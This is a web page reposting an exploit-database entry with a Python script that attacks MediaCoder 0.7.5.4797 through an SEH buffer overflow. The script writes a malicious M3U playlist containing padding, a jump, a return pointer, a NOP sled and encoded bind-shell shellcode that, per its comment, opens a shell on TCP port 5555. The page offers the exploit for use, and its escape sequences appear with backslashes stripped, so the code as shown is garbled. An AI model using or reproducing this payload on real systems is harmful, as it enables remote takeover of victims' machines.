Home / os / win7

[local exploits] - MediaCoder-0.7.5.4797.exe 0-days Buffer O

Posted on 06 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MediaCoder-0.7.5.4797.exe 0-days Buffer Overflow Exploit(SEH) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='MediaCoder-0.7.5.4797.exe 0-days Buffer Overflow Exploit(SEH) by Oh Yaw Theng in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================================================
MediaCoder-0.7.5.4797.exe 0-days Buffer Overflow Exploit(SEH)
=============================================================

# Exploit Title: MediaCoder-0.7.5.4797.exe 0-days Buffer Overflow Exploit(SEH)
# Date: 06 / 12 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4797.exe
# Version: v0.7.5.4797   (Latest Version !!)
# Tested on: Microsoft Windows XP SP2
# CVE : N / A
# My favorit Exploit DataBase 1337db.com 

#!/usr/bin/python

filename = &quot;crash.m3u&quot;

junk = &quot;x41&quot; * 764
handler = &quot;xEBx10x90x90&quot;
pointer = &quot;x3Ex21xD0x63&quot;  # 63D0213E   01612DC5
nops = &quot;x90&quot; * 20

# Bind at TCP Port 5555 !  (COnnect and Owned the Machine ! DEADBEEF !)
shellcode =(
&quot;xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49&quot;
&quot;x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36&quot;
&quot;x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34&quot;
&quot;x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41&quot;
&quot;x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e&quot;
&quot;x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48&quot;
&quot;x4ex36x46x32x46x32x4bx48x45x34x4ex43x4bx58x4ex37&quot;
&quot;x45x50x4ax47x41x30x4fx4ex4bx58x4fx44x4ax51x4bx58&quot;
&quot;x4fx45x42x42x41x30x4bx4ex49x54x4bx38x46x43x4bx58&quot;
&quot;x41x50x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c&quot;
&quot;x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e&quot;
&quot;x46x4fx4bx43x46x45x46x32x4ax42x45x37x45x4ex4bx58&quot;
&quot;x4fx35x46x42x41x30x4bx4ex48x36x4bx48x4ex50x4bx54&quot;
&quot;x4bx38x4fx45x4ex31x41x50x4bx4ex43x30x4ex52x4bx38&quot;
&quot;x49x38x4ex46x46x32x4ex41x41x36x43x4cx41x43x4bx4d&quot;
&quot;x46x46x4bx48x43x54x42x43x4bx48x42x54x4ex50x4bx48&quot;
&quot;x42x37x4ex31x4dx4ax4bx38x42x34x4ax30x50x45x4ax46&quot;
&quot;x50x58x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x46&quot;
&quot;x43x35x48x36x4ax46x43x33x44x53x4ax46x47x47x43x47&quot;
&quot;x44x53x4fx35x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e&quot;
&quot;x4ex4fx4bx33x42x45x4fx4fx48x4dx4fx55x49x48x45x4e&quot;
&quot;x48x36x41x58x4dx4ex4ax30x44x50x45x35x4cx56x44x30&quot;
&quot;x4fx4fx42x4dx4ax56x49x4dx49x50x45x4fx4dx4ax47x45&quot;
&quot;x4fx4fx48x4dx43x35x43x35x43x55x43x45x43x35x43x54&quot;
&quot;x43x35x43x34x43x35x4fx4fx42x4dx48x36x4ax36x45x31&quot;
&quot;x43x4bx48x56x43x35x49x38x41x4ex45x39x4ax46x46x4a&quot;
&quot;x4cx51x42x57x47x4cx47x35x4fx4fx48x4dx4cx46x42x41&quot;
&quot;x41x55x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52&quot;
&quot;x49x4ex47x55x4fx4fx48x4dx43x55x45x55x4fx4fx42x4d&quot;
&quot;x4ax46x45x4ex49x44x48x58x49x44x47x55x4fx4fx48x4d&quot;
&quot;x42x45x46x35x46x45x45x45x4fx4fx42x4dx43x49x4ax36&quot;
&quot;x47x4ex49x47x48x4cx49x57x47x35x4fx4fx48x4dx45x55&quot;
&quot;x4fx4fx42x4dx48x46x4cx46x46x46x48x36x4ax36x43x56&quot;
&quot;x4dx36x49x48x45x4ex4cx56x42x45x49x55x49x52x4ex4c&quot;
&quot;x49x38x47x4ex4cx36x46x44x49x38x44x4ex41x33x42x4c&quot;
&quot;x43x4fx4cx4ax50x4fx44x44x4dx42x50x4fx44x54x4ex32&quot;
&quot;x43x49x4dx48x4cx47x4ax43x4bx4ax4bx4ax4bx4ax4ax36&quot;
&quot;x44x57x50x4fx43x4bx48x51x4fx4fx45x37x46x54x4fx4f&quot;
&quot;x48x4dx4bx45x47x45x44x55x41x35x41x45x41x35x4cx56&quot;
&quot;x41x30x41x35x41x35x45x45x41x55x4fx4fx42x4dx4ax46&quot;
&quot;x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46&quot;
&quot;x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx48x47x35x4ex4f&quot;
&quot;x43x38x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d&quot;
&quot;x4ax36x42x4fx4cx48x46x30x4fx35x43x35x4fx4fx48x4d&quot;
&quot;x4fx4fx42x4dx5a&quot;)

exploit = junk + handler + pointer + nops + shellcode

textfile = open(filename,&#039;w&#039;)
textfile.write(exploit)
textfile.close()


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-06]</pre></body></html>

 

TOP